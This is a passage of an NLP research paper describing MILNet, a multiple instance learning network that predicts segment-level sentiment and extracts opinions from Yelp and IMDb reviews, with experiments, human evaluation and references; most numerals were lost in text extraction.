to more conventional neural architectures and other baselines on detecting segment sentiment and extracting informative opinions in reviews. background our work lies at the intersection of multiple research areas, including sentiment classification, opinion mining and multiple instance learning. we review related work in these areas below. sentiment classification sentiment classification is one of the most popular tasks in sentiment anal- ysis. early work focused on unsupervised meth- ods and the creation of sentiment lexicons (turney, ; hu and liu, ; wiebe et al., ; bac- cianella et al., ) based on which the overall po- our code and spot dataset are publicly available at: https://github.com/stangelid/milnet-sent larity of a text can be computed (e,g., by aggregating the sentiment scores of constituent words). more re- cently, taboada et al. ( ) introduced so-cal, a state-of-the-art method that combines a rich senti- ment lexicon with carefully defined rules over syn- tax trees to predict sentence sentiment. supervised learning techniques have subse- quently dominated the literature (pang et al., ; pang and lee, ; qu et al., ; xia and zong, ; wang and manning, ; le and mikolov, ) thanks to user-generated sentiment labels or large-scale crowd-sourcing efforts (socher et al., ). neural network models in particular have achieved state-of-the-art performance on vari- ous sentiment classification tasks due to their abil- ity to alleviate feature engineering. kim ( ) introduced a very successful cnn architecture for sentence-level classification, whereas other work (socher et al., ; socher et al., ) uses recur- sive neural networks to learn sentiment for segments of varying granularity (i.e., words, phrases, and sen- tences). we describe kim’s ( ) approach in more detail as it is also used as part of our model. let xi denote a k-dimensional word embedding of the i-th word in text segment s of length n. the segment’s input representation is the concatenation of word embeddings x , . . . , xn, resulting in word matrix x. let xi:i+j refer to the concatenation of embeddings xi, . . . , xi+j. a convolution filter w ∈ rlk, applied to a window of l words, produces a new feature ci = relu(w ◦ xi:i+l + b), where relu is the rectified linear unit non-linearity, ‘◦’ denotes the entrywise product followed by a sum over all elements and b ∈ r is a bias term. ap- plying the same filter to every possible window of word vectors in the segment, produces a feature map c = [c , c , . . . , cn−l+ ]. multiple feature maps for varied window sizes are applied, resulting in a fixed-size segment representation v via max-over- time pooling. we will refer to the application of con- volution to an input word matrix x, as cnn(x). a final sentiment prediction is produced using a soft- max classifier and the model is trained via back- propagation using sentence-level sentiment labels. the availability of large-scale datasets (diao et al., ; tang et al., ) has also led to the de- velopment of document-level sentiment classifiers which exploit hierarchical neural representations. these are obtained by first building representations of sentences and aggregating those into a document feature vector (tang et al., ). yang et al. ( ) further acknowledge that words and sentences are deferentially important in different contexts. they present a model which learns to attend (bahdanau et al., ) to individual text parts when constructing document representations. we describe such an ar- chitecture in more detail as we use it as a point of comparison with our own model. given document d comprising segments (s , . . . , sm), a hierarchical network with at- tention (henceforth hiernet; based on yang et al., ) produces segment representations (v , . . . , vm) which are subsequently fed into a bidirectional gru module (bahdanau et al., ), whose resulting hidden vectors (h , . . . , hm) are used to produce attention weights (a , . . . , am) (see section . for more details on the attention mechanism). a document is represented as the weighted average of the segments’ hidden vec- tors vd = ∑ i aihi. a final sentiment prediction is obtained using a softmax classifier and the model is trained via back-propagation using document-level sentiment labels. the architecture is illustrated in figure (a). in their proposed model, yang et al. ( ) use bidirectional gru modules to represent segments as well as documents, whereas we use a more efficient cnn encoder to compose words into segment vectors (i.e., vi = cnn(xi)). note that models like hiernet do not naturally predict sentiment for individual segments; we discuss how they can be used for segment-level opinion extraction in section . . our own work draws inspiration from represen- tation learning (tang et al., ; kim, ), es- pecially the idea that not all parts of a document convey sentiment-worthy clues (yang et al., ). our model departs from previous approaches in that it provides a natural way of predicting the polar- ity of individual text segments without requiring segment-level annotations. moreover, our atten- tion mechanism directly facilitates opinion detection rather than simply aggregating sentence representa- tions into a single document vector. when applied to the yelp’ and imdb document clas- sification datasets, the use of cnns results in a relative perfor- mance decrease of < % compared yang et al’s model ( ). opinion mining a standard setting for opinion mining and summarization (lerman et al., ; carenini et al., ; ganesan et al., ; di fab- brizio et al., ; gerani et al., ) assumes a set of documents that contain opinions about some en- tity of interest (e.g., camera). the goal of the system is to generate a summary that is representative of the average opinion and speaks to its important aspects (e.g., picture quality, battery life, value). output summaries can be extractive (lerman et al., ) or abstractive (gerani et al., ; di fabbrizio et al., ) and the underlying systems exhibit vary- ing degrees of linguistic sophistication from identi- fying aspects (lerman et al., ) to using rst- style discourse analysis, and manually defined tem- plates (gerani et al., ; di fabbrizio et al., ). our proposed method departs from previous work in that it focuses on detecting opinions in individ- ual documents. given a review, we predict the po- larity of every segment, allowing for the extrac- tion of sentiment-heavy opinions. we explore the usefulness of edu segmentation inspired by li et al. ( ), who show that edu-based summaries align with near-extractive summaries constructed by news editors. importantly, our model is trained in a weakly-supervised fashion on large scale docu- ment classification datasets without recourse to fine- grained labels or gold-standard opinion summaries. multiple instance learning our models adopt a multiple instance learning (mil) framework. mil deals with problems where labels are associated with groups of instances or bags (documents in our case), while instance labels (segment-level polarities) are unobserved. an aggregation function is used to combine instance predictions and assign labels on the bag level. the goal is either to label bags (keeler and rumelhart, ; dietterich et al., ; maron and ratan, ) or to simultaneously infer bag and instance labels (zhou et al., ; wei et al., ; kotzias et al., ). we view segment-level senti- ment analysis as an instantiation of the latter variant. initial mil efforts for binary classification made the strong assumption that a bag is negative only if all of its instances are negative, and positive oth- erwise (dietterich et al., ; maron and ratan, ; zhang et al., ; andrews and hofmann, ; carbonetto et al., ). subsequent work re- laxed this assumption, allowing for prediction com- binations better suited to the tasks at hand. wei- dmann et al. ( ) introduced a generalized mil framework, where a combination of instance types is required to assign a bag label. zhou et al. ( ) used graph kernels to aggregate predictions, exploit- ing relations between instances in object and text categorization. xu and frank ( ) proposed a multiple-instance logistic regression classifier where instance predictions were simply averaged, assum- ing equal and independent contribution toward bag classification. more recently, kotzias et al. ( ) used sentence vectors obtained by a pre-trained hi- erarchical cnn (denil et al., ) as features un- der an unweighted average mil objective. predic- tion averaging was further extended by pappas and popescu-belis ( ; ), who used a weighted summation of predictions, an idea which we also adopt in our work. applications of mil are many and varied. mil was first explored by keeler and rumelhart ( ) for recognizing handwritten post codes, where the position and value of individual digits was unknown. mil techniques have since been applied to drug ac- tivity prediction (dietterich et al., ), image re- trieval (maron and ratan, ; zhang et al., ), object detection (zhang et al., ; carbonetto et al., ; cour et al., ), text classification (an- drews and hofmann, ), image captioning (wu et al., ), paraphrase detection (xu et al., ), and information extraction (hoffmann et al., ). when applied to sentiment analysis, mil takes advantage of supervision signals on the document level in order to train segment-level sentiment pre- dictors. although their work is not couched in the framework of mil, täckström and mcdonald ( ) show how sentence sentiment labels can be learned as latent variables from document-level an- notations using hidden conditional random fields. pappas and popescu-belis ( ) use a multiple in- stance regression model to assign sentiment scores to specific aspects of products. the group-instance cost function (gicf), proposed by kotzias et al. ( ), averages sentence sentiment predictions dur- ing trainng, while ensuring that similar sentences receive similar polarity labels. their work uses a pre-trained hierarchical cnn to obtain sentence em- beddings, but is not trainable end-to-end, in contrast with our proposed network. additionally, none of the aforementioned efforts explicitly evaluate opin- ion extraction quality. methodology in this section we describe how multiple instance learning can be used to address some of the draw- backs seen in previous approaches, namely the need for expert knowledge in lexicon-based sentiment analysis (taboada et al., ), expensive fine- grained annotation on the segment level (kim, ; socher et al., ) or the inability to naturally pre- dict segment sentiment (yang et al., ). . problem formulation under multiple instance learning (mil), a dataset d is a collection of labeled bags, each of which is a group of unlabeled instances. specifically, each document d is a sequence (bag) of segments (in- stances). this sequence d = (s , s , . . . , sm) is ob- tained from a document segmentation policy (see section for details). a discrete sentiment label yd ∈ [ , c] is associated with each document, where the labelset is ordered and classes and c corre- spond to maximally negative and maximally posi- tive sentiment. it is assumed that yd is an unknown function of the unobserved segment-level labels: yd = f(y , y , . . . , ym) ( ) probabilistic sentiment classifiers will produce document-level predictions ŷd by selecting the most probable class according to class distribution pd = 〈p( )d , . . . , p (c) d 〉. in a non-mil framework a classifier would learn to predict the document’s sen- timent by directly conditioning on its segments’ fea- ture representations or their aggregate: pd = f̂θ(v , v , . . . , vm) ( ) in contrast, a mil classifier will produce a class dis- tribution pi for each segment and additionally learn to combine these into a document-level prediction: pi = ĝθs(vi) , ( ) pd = f̂θd(p , p , . . . , pm) . ( ) in this work, ĝ and f̂ are defined using a single neu- ral network, described below. figure : a hierarchical network (hiernet) for document-level sentiment classification and our proposed multiple instance learning network (milnet). the models use the same attention mechanism to combine segment vectors and predictions respectively. . multiple instance learning network hierarchical neural models like hiernet have been used to predict document-level polarity by first en- coding sentences and then combining these repre- sentations into a document vector. hierarchical vec- tor composition produces powerful sentiment pre- dictors, but lacks the ability to introspectively judge the polarity of individual segments. our multiple instance learning network (hence- forth milnet) is based on the following intuitive assumptions about opinionated text. each segment conveys a degree of sentiment polarity, ranging from very negative to very positive. additionally, seg- ments have varying degrees of importance, in rela- tion to the overall opinion of the author. the overar- ching polarity of a text is an aggregation of segment polarities, weighted by their importance. thus, our model attempts to predict the polarity of segments and decides which parts of the document are good indicators of its overall sentiment, allowing for the detection of sentiment-heavy opinions. an illustra- tion of milnet is shown in figure (b); the model consists of three components: a cnn segment en- coder, a softmax segment classifier and an attention- based prediction weighting module. segment encoding an encoding vi = cnn(xi) is produced for each segment, using the cnn archi- tecture described in section . segment classification obtaining a separate rep- resentation vi for every segment in a document al- lows us to produce individual segment sentiment predictions pi = 〈p( )i , . . . , p (c) i 〉. this is achieved using a softmax classifier: pi = softmax(wcvi + bc) , ( ) where wc and bc are the classifier’s parameters, shared across all segments. individual distributions pi are shown in figure (b) as small bar-charts. document classification in the simplest case, document-level predictions can be produced by taking the average of segment class distributions: p (c) d = /m ∑ i p (c) i , c ∈ [ , c]. this is, however, a crude way of combining segment sentiment, as not all parts of a document convey important sentiment clues. we opt for a segment attention mechanism which rewards text units that are more likely to be good sentiment predictors. our attention mechanism is based on a bidirec- tional gru component (bahdanau et al., ) and the starters were quite bland. i didn’t enjoy most of them, but the burger was brilliant! . . . . p ro b a b il it y att: . polarity − gtd-pol. att: . − att: . − figure : polarity scores (bottom) obtained from class probability distributions for three edus (top) ex- tracted from a restaurant review. attention weights (top) are used to fine-tune the obtained polarities. inspired by yang et al. ( ). however, in con- trast to their work, where attention is used to com- bine sentence representations into a single document vector, we utilize a similar technique to aggregate individual sentiment predictions. we first use separate gru modules to produce forward and backward hidden vectors, which are then concatenated: −→ h i = −−−→ gru(vi), ( ) ←− h i = ←−−− gru(vi), ( ) hi = [ −→ h i, ←− h i], i ∈ [ , m] . ( ) the importance of each segment is measured with the aid of a vector ha, as follows: h′i = tanh(wahi + ba) , ( ) ai = exp(h′ti ha)∑ i exp(h ′t i ha) , ( ) where equation ( ) defines a one-layer mlp that produces an attention vector for the i-th segment. attention weights ai are computed as the normal- ized similarity of each h′i with ha. vector ha, which is randomly initialized and learned during training, can be thought of as a trained key, able to recognize sentiment-heavy segments. the attention mecha- nism is depicted in the dashed box of figure , with attention weights shown as shaded circles. finally, we obtain a document-level distribution over sentiment labels as the weighted sum of seg- ment distributions (see top of figure (b)): p (c) d = ∑ i aip (c) i , c ∈ [ , c] . ( ) training the model is trained end-to-end on doc- uments with user-generated sentiment labels. we use the negative log likelihood of the document-level prediction as an objective function: l = − ∑ d log p (yd) d ( ) polarity-based opinion extraction after training, our model can produce segment-level sentiment predictions for unseen texts in the form of class probability distributions. a direct application of our method is opinion extraction, where highly positive and negative snippets are selected from the original document, producing extractive sentiment summaries, as described below. polarity scoring in order to extract opinion sum- maries, we need to rank segments according to their sentiment polarity. we introduce a method that takes our model’s confidence in the prediction into ac- count, by reducing each segment’s class probability distribution pi to a single real-valued polarity score. to achieve this, we first define a real-valued class weight vector w = 〈w( ), . . . , w(c) |w(c) ∈ [− , ]〉 that assigns uniformly-spaced weights to the ordered labelset, such that w(c+ ) −w(c) = c− . for exam- ple, in a -class scenario, the class weight vector would be w = 〈− ,− . , , . , 〉. we compute the polarity score of a segment as the dot-product of the probability distribution pi with vector w: polarity(si) = ∑ c p (c) i w (c) ∈ [− , ] ( ) gated polarity as a way of increasing the effec- tiveness of our method, we introduce a gated exten- sion that uses the attention mechanism of our model to further differentiate between segments that carry significant sentiment cues and those that do not: gated-polarity(si) = ai ·polarity(si) , ( ) where ai is the attention weight assigned to the i-th segment. this forces the polarity scores of segments the model does not attend to closer to . an illustration of our polarity scoring function is provided in figure , where the class predic- tions (top) of three restaurant review segments are mapped to their corresponding polarity scores (bot- tom). we observe that our method produces the de- sired result; segments and convey negative senti- ment and receive negative scores, whereas the third segment is mapped to a positive score. although the same discrete class label is assigned to the first two, the second segment’s score is closer to (neutral) as its class probability mass is more evenly distributed. segmentation policies as mentioned earlier, one of the hypotheses investigated in this work regards the use of subsentential units as the basis of extrac- tion. specifically, our model was applied to sen- tences and elementary discourse units (edus), ob- tained from a rhetorical structure theory (rst) parser (feng and hirst, ). according to rst, documents are first segmented into edus corre- sponding roughly to independent clauses which are then recursively combined into larger discourse spans. this results in a tree representation of the document, where connected nodes are characterized by discourse relations. we only utilize rst’s seg- mentation, and leave the potential use of the tree structure to future work. the example in figure illustrates why edu- based segmentation might be beneficial for opinion extraction. the second and third edus correspond to the sentence: i didn’t enjoy most of them, but the burger was brilliant. taken as a whole, the sentence conveys mixed sentiment, whereas the edus clearly convey opposing sentiment. experimental setup in this section we describe the data used to assess the performance of our model. we also give details on model training and comparison systems. yelp’ imdb documents , , average #sentences . . average #edus . . average #words vocabulary size , , classes – – table : document-level sentiment classification datasets used to train our models. yelp’ seg imdbseg sent. edus sent. edus #segments , , , , #documents classes {– , , +} {– , , +} table : spot dataset: numbers of documents and segments with polarity annotations. . datasets our models were trained on two large-scale senti- ment classification collections. the yelp’ corpus was introduced in tang et al. ( ) and contains customer reviews of local businesses, each associ- ated with human ratings on a scale from (negative) to (positive). the imdb corpus of movie reviews was obtained from diao et al. ( ); each review is associated with user ratings ranging from to . both datasets are split into training ( %), validation ( %) and test ( %) sets. a summary of statistics for each collection is provided in table . in order to evaluate model performance on the segment level, we constructed a new dataset named spot (as a shorthand for segment polarity) by annotating documents from the yelp’ and imdb collections. specifically, we sampled reviews from each collection such that all document-level classes are represented uniformly, and the document lengths are representative of the respective corpus. docu- ments were segmented into sentences and edus, re- sulting in two segment-level datasets per collection. statistics are summarized in table . each review was presented to three amazon me- chanical turk (amt) annotators who were asked to judge the sentiment conveyed by each segment (i.e., sentence or edu) as negative, neutral, or pos- . . . . . . . . . p ro p o rt io n o f se g m e n ts yelp' - sentences yelp' - edus negative neutral positive document class . . . . . . . . . p ro p o rt io n o f se g m e n ts imdb - sentences document class imdb - edus figure : distribution of segment-level labels per document-level class on our the spot datasets. itive. we assigned labels using a majority vote or a fourth annotator in the rare cases of no agreement (< %). figure shows the distribution of segment labels for each document-level class. as expected, documents with positive labels contain a larger num- ber of positive segments compared to documents with negative labels and vice versa. neutral seg- ments are distributed in an approximately uniform manner across document classes. interestingly, the proportion of neutral edus is significantly higher compared to neutral sentences. the observation re- inforces our argument in favor of edu segmenta- tion, as it suggests that a sentence with positive or negative overall polarity may still contain neutral edus. discarding neutral edus, could therefore lead to more concise opinion extraction compared to relying on entire sentences. we further experimented on two collections intro- duced by kotzias et al. ( ) which also originate from the yelp’ and imdb datasets. each collec- tion consists of , randomly sampled sentences annotated with binary sentiment labels. . model comparison on the task of segment classification we compared milnet, our multiple instance learning network, against the following methods: majority: majority class applied to all instances. so-cal: state-of-the-art lexicon-based system that classifies segments into positive, neutral, and negative classes (taboada et al., ). seg-cnn: fully-supervised cnn segment classi- fier trained on spot’s labels (kim, ). gicf: the group-instance cost function model introduced in kotzias et al. ( ). this is an unweighted average prediction aggregation mil method that uses sentence features from a pre- trained convolutional neural model. hiernet: hiernet does not explicitly generate individual segment predictions. segment polarity scores are obtained by assigning the document- level prediction to every segment. we can then produce finer-grained polarity distinctions via gating, using the model’s attention weights. we further illustrate the differences between hi- ernet and milnet in figure , which includes short descriptions and simplified equations for each model. milnet naturally produces distinct seg- ment polarities, while hiernet assigns a single po- larity score to every segment. in both cases, gating is a further means of identifying neutral segments. finally, we differentiate between variants of hi- ernet and milnet according to: polarity source: controls whether we assign polar- ities via segment-specific or document-wide pre- dictions. hiernet only allows for document- wide predictions. milnet can use both. attention: we use models without gating (no sub- script), with gating (gt subscript) as well as mod- els trained with the attention mechanism disabled, falling back to simple averaging (avg subscript). . model training and evaluation we trained milnet and hiernet using adadelta (zeiler, ) for epochs. mini-batches of documents were organized based on the reviews’ segment and document lengths so the amount of padding was minimized. we used -dimensional pre-trained word vec embeddings. we tuned hyper- parameters on the validation sets of the document classification collections, resulting in the follow- ing configuration (unless otherwise noted). for the cnn segment encoder, we used window sizes of , figure : system pipelines for hiernet and milnet showing distinct phases for sentiment analysis. and words with feature maps per window size, resulting in -dimensional segment vectors. the gru hidden vector dimensions for each direction were set to and the attention vector dimension- ality to . we used l -normalization and dropout to regularize the softmax classifiers and additional dropout on the internal gru connections. real-valued polarity scores produced by the two models are mapped to discrete labels using two ap- propriate thresholds t , t ∈ [− , ], so that a seg- ment s is classified as negative if polarity(s) < t , positive if polarity(s) > t or neutral otherwise. to evaluate performance, we use macro-averaged f which is unaffected by class imbalance. we select optimal thresholds using -fold cross-validation and report mean scores across folds. the fully-supervised convolutional segment clas- sifier (seg-cnn) uses the same window size and feature map configuration as our segment encoder. seg-cnn was trained on spot using segment la- bels directly and -fold cross-validation (identical folds as in our main models). seg-cnn is not di- rectly comparable to milnet (or hiernet) due to differences in supervision type (segment vs. docu- ment labels) and training size ( k- k segment la- bels vs. ∼ k document labels). however, the the discretization of polarities is only used for evaluation purposes and is not necessary for summary extraction, where we only need a relative ranking of segments. comparison is indicative of the utility of fine-grained sentiment predictors that do not rely on expensive segment-level annotations. results we evaluated models in two ways. we first assessed their ability to classify segment polarity in reviews using the newly created spot dataset and, addition- ally, the sentence corpora of kotzias et al. ( ). our second suite of experiments focused on opin- ion extraction: we conducted a judgment elicita- tion study to determine whether extracts produced by milnet are useful and of higher quality com- pared to hiernet and other baselines. we were also interested to find out whether edus provide a better basis for opinion extraction than sentences. . segment classification table summarizes our results. the first block in the table reports the performance of the majority class baseline. the second block considers mod- els that do not utilize segment-level predictions, namely hiernet which assigns polarity scores to segments using its document-level predictions, as well as the variant of milnet which similarly uses document-level predictions only (equation ( )). in the third block, milnet’s segment-level predic- tions are used. each block further differentiates be- tween three levels of attention integration, as previ- method yelp’ seg imdbseg sent edu sent edu majority . † . † . † . † d oc um en t hiernetavg . † . † . † . † hiernet . † . † . † . † hiernetgt . † . . . † milnetavg . † . † . † . † milnet . † . † . † . † milnetgt . † . . † . † se gm milnetavg . † . † . † . † milnet . . . † . † milnetgt . . . . so-cal . † . † . † . seg-cnn . † . . † . † table : segment classification results (in macro- averaged f ). † indicates that the system in question is significantly different from milnetgt (approxi- mate randomization test (noreen, ), p < . ). ously described. the final block shows the perfor- mance of so-cal and the seg-cnn classifier. when considering models that use document- level supervision, milnet with gated, segment- specific polarities obtains the best classification per- formance across all four datasets. interestingly, it performs comparably to seg-cnn, the fully- supervised segment classifier, which provides addi- tional evidence that milnet can effectively iden- tify segment polarity without the need for segment- level annotations. our model also outperforms the strong so-cal baseline in all but one datasets which is remarkable given the expert knowledge and linguistic information used to develop the lat- ter. document-level polarity predictions result in lower classification performance across the board. differences between the standard hierarchical and multiple instance networks are less pronounced in this case, as milnet loses the advantage of produc- ing segment-specific sentiment predictions. models without attention perform worse in most cases. the use of gated polarities benefits all model configura- tions, indicating the method’s ability to selectively focus on segments with significant sentiment cues. we further analyzed the polarities assigned by milnet and hiernet to positive, negative, and neutral segments non-gtd gated se nt hiernet . . milnet . . non-gtd gated e d u hiernet . . milnet . . table : f scores for neutral segments (yelp’ ). method yelp imdb gicf . . gicfhn . . gicfmn . . milnet . . table : accuracy scores on the sentence classi- fication datasets intro- duced in kotzias et al. ( ). − . . . . . . . . . negative − hiernet neutral − positive − . . . . . . . . . − polarity milnet − figure : distribution of predicted polarity scores across three classes (yelp’ sentences). neutral segments. figure illustrates the distribu- tion of polarity scores produced by the two mod- els on the yelp’ dataset (sentence segmentation). in the case of negative and positive sentences, both models demonstrate appropriately skewed distribu- tions. however, the neutral class appears to be par- ticularly problematic for hiernet, where polarity scores are scattered across a wide range of values. in contrast, milnet is more successful at identify- ing neutral sentences, as its corresponding distribu- tion has a single mode near zero. attention gating addresses this issue by moving the polarity scores of sentiment-neutral segments towards zero. this is illustrated in table where we observe that gated variants of both models do a better job at identify- ing neutral segments. the effect is very significant for hiernet, while milnet benefits slightly and remains more effective overall. similar trends were observed in all four spot datasets. in order to examine the effect of training size, we trained multiple models using subsets of the original document collections. we trained on five random m a c ro -f yelp sentences yelp edus training size m a c ro -f imdb sentences training size imdb edus milnet hiernet seg-cnn figure : performance of hiernetgt and milnetgt for varying training sizes. subsets for each training size, ranging from doc- uments to the full training set, and tested segment classification performance on spot. the results, av- eraged across trials, are presented in figure . with the exception of the imdb edu-segmented dataset, milnet only requires a few thousand training doc- uments to outperform the supervised seg-cnn. hi- ernet follows a similar curve, but is inferior to milnet. a reason for milnet’s inferior perfor- mance on the imdb corpus (edu-split) can be low- quality edus, due to the noisy and informal style of language used in imdb reviews. finally, we compared milnet against the gicf model (kotzias et al., ) on their yelp and imdb sentence sentiment datasets. their model re- quires sentence embeddings from a pre-trained neu- ral model. we used the hierarchical cnn from their work (denil et al., ) and, additionally, pre-trained hiernet and milnet sentence em- beddings. the results in table show that milnet outperforms all variants of gifc. our models also seem to learn better sentence embeddings, as they improve gicf’s performance on both collections. gicf only handles binary labels, which makes it unsuitable for the full-scale comparisons in table . here, we binarize our training datasets and use same-sized sentence embeddings for all four models (r for yelp, r for imdb). method informativeness polarity coherence hiernetsent . . . milnetsent . . . unsure . . . hiernetedu . † . † . milnetedu . . . unsure . . . milnetsent . † . † . † milnetedu . . . unsure . . . lead . . † . random . † . † . † milnetedu . . . unsure . . . table : human evaluation results (in percentages). † indicates that the system in question is signifi- cantly different from milnet (sign-test, p < . ). . opinion extraction in our opinion extraction experiments, amt work- ers (all native english speakers) were shown an original review and a set of extractive, bullet-style summaries, produced by competing systems using a % compression rate. participants were asked to decide which summary was best according to three criteria: informativeness (which summary best cap- tures the salient points of the review?), polarity (which summary best highlights positive and neg- ative comments?) and coherence (which summary is more coherent and easier to read?). subjects were allowed to answer “unsure” in cases where they could not discriminate between summaries. we used all reviews from our spot dataset and collected three responses per document. we ran four judg- ment elicitation studies: one comparing hiernet and milnet when summarizing reviews segmented as sentences, a second one comparing the two mod- els with edu segmentation, a third which compares edu- and sentence-based summaries produced by milnet, and a fourth where edu-based sum- maries from milnet were compared to a lead (the first n words from each document) and a ran- dom (random edus) baseline. table summarizes our results, showing the pro- portion of participants that preferred each system. the first block in the table shows a slight prefer- [rating: ????] as with any family-run hole in the wall, service can be slow. what the staff lacked in speed, they made up for in charm. the food was good, but nothing wowed me. i had the pierogis while my friend had swedish meatballs. both dishes were tasty, as were the sides. one thing that was disappointing was that the food was a a little cold (lukewarm). the restaurant itself is bright and clean. i will go back again when i feel like eating outside the box. e d u -b as ed extracted via hiernetgt ( . ) [+ . ] the food was good+ ( . ) [+ . ] but nothing wowed me.+ ( . ) [+ . ] the restaurant itself is bright and clean+ ( . ) [+ . ] both dishes were tasty+ ( . ) [+ . ] i will go back again+ extracted via milnetgt ( . ) [+ . ] the food was good+ ( . ) [+ . ] the restaurant itself is bright and clean+ ( . ) [+ . ] i will go back again+ ( . ) [– . ] but nothing wowed me.− ( . ) [– . ] the food was a a little cold (lukewarm)− s en t- ba se d ( . ) [+ . ] both dishes were tasty, as were the sides+ ( . ) [+ . ] the food was good, but nothing wowed me+ ( . ) [+ . ] one thing that was disappointing was that the food was a a little cold (lukewarm)+ ( . ) [+ . ] both dishes were tasty, as were the sides+ ( . ) [+ . ] i will go back again when i feel like eating outside the box+ ( . ) [– . ] the food was good, but nothing wowed me− (number): attention weight [number]: non-gated polarity score text+: extracted positive opinion text−: extracted negative opinion figure : example edu- and sentence-based opinion summaries produced by hiernetgt and milnetgt. ence for milnet across criteria. the second block shows significant preference for milnet against hiernet on informativeness and polarity, whereas hiernet was more often preferred in terms of coherence, although the difference is not statisti- cally significant. the third block compares sentence and edu summaries produced by milnet. edu summaries were perceived as significantly better in terms of informativeness and polarity, but not co- herence. this is somewhat expected as edus tend to produce more terse and telegraphic text and may seem unnatural due to segmentation errors. in the fourth block we observe that participants find mil- net more informative and better at distilling polar- ity compared to the lead and random (edus) baselines. we should point out that the lead sys- tem is not a strawman; it has proved hard to out- perform by more sophisticated methods (nenkova, ), particularly on the newswire domain. example edu- and sentence-based summaries produced by gated variants of hiernet and mil- net are shown in figure , with attention weights and polarity scores of the extracted segments shown in round and square brackets respectively. for both granularities, hiernet’s positive document-level prediction results in a single polarity score assigned to every segment, and further adjusted using the cor- responding attention weights. the extracted seg- ments are informative, but fail to capture the neg- ative sentiment of some segments. in contrast, mil- net is able to detect positive and negative snippets via individual segment polarities. here, edu seg- mentation produced a more concise summary with a clearer grouping of positive and negative snippets. conclusions in this work, we presented a neural network model for fine-grained sentiment analysis within the frame- work of multiple instance learning. our model can be trained on large scale sentiment classifica- tion datasets, without the need for segment-level labels. as a departure from the commonly used vector-based composition, our model first predicts sentiment at the sentence- or edu-level and subse- quently combines predictions up the document hier- archy. an attention-weighted polarity scoring tech- nique provides a natural way to extract sentiment- heavy opinions. experimental results demonstrate the superior performance of our model against more conventional neural architectures. human evalua- tion studies also show that milnet opinion extracts are preferred by participants and are effective at cap- turing informativeness and polarity, especially when using edu segments. in the future, we would like to focus on multi-document, aspect-based extraction (cao et al., ) and ways of improving the coher- ence of our summaries by taking into account more fine-grained discourse information (daumé iii and marcu, ). acknowledgments the authors gratefully acknowledge the support of the european research council (award num- ber ). we thank tacl action editor ani nenkova and the anonymous reviewers whose feed- back helped improve the present paper, as well as charles sutton, timothy hospedales, and members of edinburghnlp for helpful discussions and sug- gestions. references stuart andrews and thomas hofmann. . multiple instance learning via disjunctive programming boost- ing. in advances in neural information processing systems , pages – . curran associates, inc. stefano baccianella, andrea esuli, and fabrizio sebas- tiani. . sentiwordnet . : an enhanced lexi- cal resource for sentiment analysis and opinion min- ing. in proceedings of the th conference on in- ternational language resources and evaluation, vol- ume , pages – , valletta, malta. dzmitry bahdanau, kyunghyun cho, and yoshua ben- gio. . neural machine translation by jointly learning to align and translate. in proceedings of the rd international conference on learning represen- tations, san diego, california, usa. parminder bhatia, yangfeng ji, and jacob eisenstein. . better document-level sentiment analysis from rst discourse parsing. in proceedings of the conference on empirical methods in natural lan- guage processing, pages – , lisbon, portu- gal. ziqiang cao, wenjie li, sujian li, and furu wei. . improving multi-document summarization via text classification. in proceedings of the st aaai con- ference on artificial intelligence, pages – , san francisco, california, usa. peter carbonetto, gyuri dorkó, cordelia schmid, hen- drik kück, and nando de freitas. . learning to recognize objects with little supervision. international journal of computer vision, ( ): – . giuseppe carenini, rymond ng, and adam pauls. . multidocument summarization of evaluative text. in proceedings of the th conference of the european chapter of the association for computational linguis- tics, pages – , trento, italy. lynn carlson, daniel marcu, and mary ellen okurowski. . building a discourse-tagged corpus in the framework of rhetorical structure theory. in current and new directions in discourse and dialogue, pages – . springer. jianpeng cheng and mirella lapata. . neural sum- marization by extracting sentences and words. in pro- ceedings of the th annual meeting of the associa- tion for computational linguistics (volume : long papers), pages – , berlin, germany. timothee cour, ben sapp, and ben taskar. . learn- ing from partial labels. journal of machine learning research, (may): – . hal daumé iii and daniel marcu. . a noisy-channel model for document compression. in proceedings of the th annual meeting of the association for com- putational linguistics, pages – , philadelphia, pennsylvania, usa. misha denil, alban demiraj, and nando de freitas. . extraction of salient sentences from labelled documents. technical report, university of oxford. giuseppe di fabbrizio, amanda stent, and robert gaizauskas. . a hybrid approach to multi- document summarization of opinions in reviews. in proceedings of the th international natural lan- guage generation conference (inlg), pages – , philadelphia, pennsylvania, usa. qiming diao, minghui qiu, chao-yuan wu, alexan- der j. smola, jing jiang, and chong wang. . jointly modeling aspects, ratings and sentiments for movie recommendation (jmars). in proceedings of the th acm sigkdd international conference on knowledge discovery and data mining, pages – , new york, ny, usa. thomas g. dietterich, richard h. lathrop, and toms lozano-prez. . solving the multiple instance problem with axis-parallel rectangles. artificial intel- ligence, ( ): – . wei vanessa feng and graeme hirst. . text-level discourse parsing with rich linguistic features. in pro- ceedings of the th annual meeting of the associa- tion for computational linguistics (volume : long papers), pages – , jeju island, korea. kavita ganesan, chengxiang zhai, and jiawei han. . opinosis: a graph based approach to abstrac- tive summarization of highly redundant opinions. in proceedings of the rd international conference on computational linguistics, pages – , beijing, china. shima gerani, yashar mehdad, giuseppe carenini, ray- mond t. ng, and bita nejat. . abstractive sum- marization of product reviews using discourse struc- ture. in proceedings of the conference on empirical methods in natural language processing, pages – , doha, qatar. raphael hoffmann, congle zhang, xiao ling, luke zettlemoyer, and daniel s weld. . knowledge- based weak supervision for information extraction of overlapping relations. in proceedings of the th an- nual meeting of the association for computational linguistics: human language technologies-volume , pages – , portland, oregon, usa. minqing hu and bing liu. . mining and summa- rizing customer reviews. in proceedings of the th acm sigkdd international conference on knowl- edge discovery and data mining, pages – , seattle, washington, usa. rie johnson and tong zhang. a. effective use of word order for text categorization with convolu- tional neural networks. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, pages – , denver, col- orado, usa. rie johnson and tong zhang. b. semi-supervised convolutional neural networks for text categorization via region embedding. in advances in neural infor- mation processing systems , pages – . curran associates, inc. jim keeler and david e. rumelhart. . a self-organizing integrated segmentation and recogni- tion neural net. in advances in neural informa- tion processing systems , pages – . morgan- kaufmann. yoon kim. . convolutional neural networks for sen- tence classification. in proceedings of the con- ference on empirical methods in natural language processing, pages – , doha, qatar. dimitrios kotzias, misha denil, nando de freitas, and padhraic smyth. . from group to individual la- bels using deep features. in proceedings of the th acm sigkdd international conference on knowl- edge discovery and data mining, pages – , sydney, australia. quoc le and tomas mikolov. . distributed repre- sentations of sentences and documents. in proceed- ings of the st international conference on machine learning, pages – , beijing, china. kevin lerman, sasha blair-goldensohn, and ryan mc- donald. 